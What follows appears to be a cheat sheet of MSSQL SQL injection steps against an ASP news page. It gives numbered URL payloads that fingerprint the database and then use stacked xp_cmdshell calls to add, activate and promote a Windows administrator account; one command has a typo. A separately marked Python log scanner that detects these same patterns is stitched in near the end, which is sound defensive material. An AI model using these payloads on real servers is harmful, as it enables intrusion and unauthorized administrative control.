MSSQL Server:
1. Guess the database name
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7 and db_name()>0
2. Guess the host name
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7 and host_name()>0
3. Guess the current user
If it is dbo, the user is sa
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7 and user>0
4. Add a new user: aaa, password bbb
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7; exec master..xp_cmdshell "net user aaa bbb /add"
5. Delete a user
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7; exec master..xp_cmdshell "net user aaa /del"
6. Add user aaa to the administrators group
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7; exec master..xp_cmdshell "net localgroup administrators aaa /add"
7. Activate user aaa
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7;exec master..xp_cmdshell "net uesr aaa /active:yes"
8. Create a temp table
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));
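From the detection side, the requests above leave a recognisable trace in web-server access logs: a numeric parameter followed by an error-inference comparison (`db_name()>0`, `host_name()>0`, `user>0`) or by a stacked statement (`; exec ... xp_cmdshell`, `; create table`). The following Python is an added example, not code from the original post; the signatures and the common-log-format sample lines are constructed assumptions to be tuned to your own application.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Assumed signatures for the probe and stacked-query shapes shown on this page.
SIGNATURES = {
    "mssql-error-inference": re.compile(
        r"\b(db_name|host_name|system_user|user)\b\s*(\(\s*\))?\s*>\s*0", re.I),
    "stacked-xp_cmdshell": re.compile(r";\s*exec\b.*\bxp_cmdshell\b", re.I),
    "stacked-ddl": re.compile(r";\s*(create|drop|alter)\s+table\b", re.I),
}

# Minimal common-log-format parser: client ip ... "GET /path?query HTTP/x.y"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (one benign request, three matching the page's patterns).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index_SiteNews_Content.asp?fID_SiteNewsContent=7 HTTP/1.1" 200 1234',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index_SiteNews_Content.asp?fID_SiteNewsContent=7%20and%20db_name()>0 HTTP/1.1" 500 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index_SiteNews_Content.asp?fID_SiteNewsContent=7;%20exec%20master..xp_cmdshell%20%22net%20user%20aaa%20bbb%20/add%22 HTTP/1.1" 200 1234',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index_SiteNews_Content.asp?fID_SiteNewsContent=7;%20create%20table%20temp(id%20nvarchar(255)) HTTP/1.1" 200 1234',
    'garbage line that does not parse',
]


def classify_request(url: str) -> list:
    """Return the names of all signatures matched by the decoded query string of one URL."""
    decoded = unquote_plus(urlsplit(url).query)  # %20 -> space, %22 -> quote, etc.
    return [name for name, pat in SIGNATURES.items() if pat.search(decoded)]


def scan_log(lines) -> list:
    """Return (client_ip, url, hits) for each parseable log line that matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable lines are skipped, never allowed to abort the scan
        ip, url = m.group(1), m.group(2)
        hits = classify_request(url)
        if hits:
            findings.append((ip, url, hits))
    return findings


if __name__ == "__main__":
    for ip, url, hits in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{', '.join(hits)}\t{url}")
```

Percent-decoding before matching matters: the same payload arrives with `%20` and `%22` in the raw log line, and a match on the undecoded text would miss it.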
MSSQL Server SQL injection notes (1)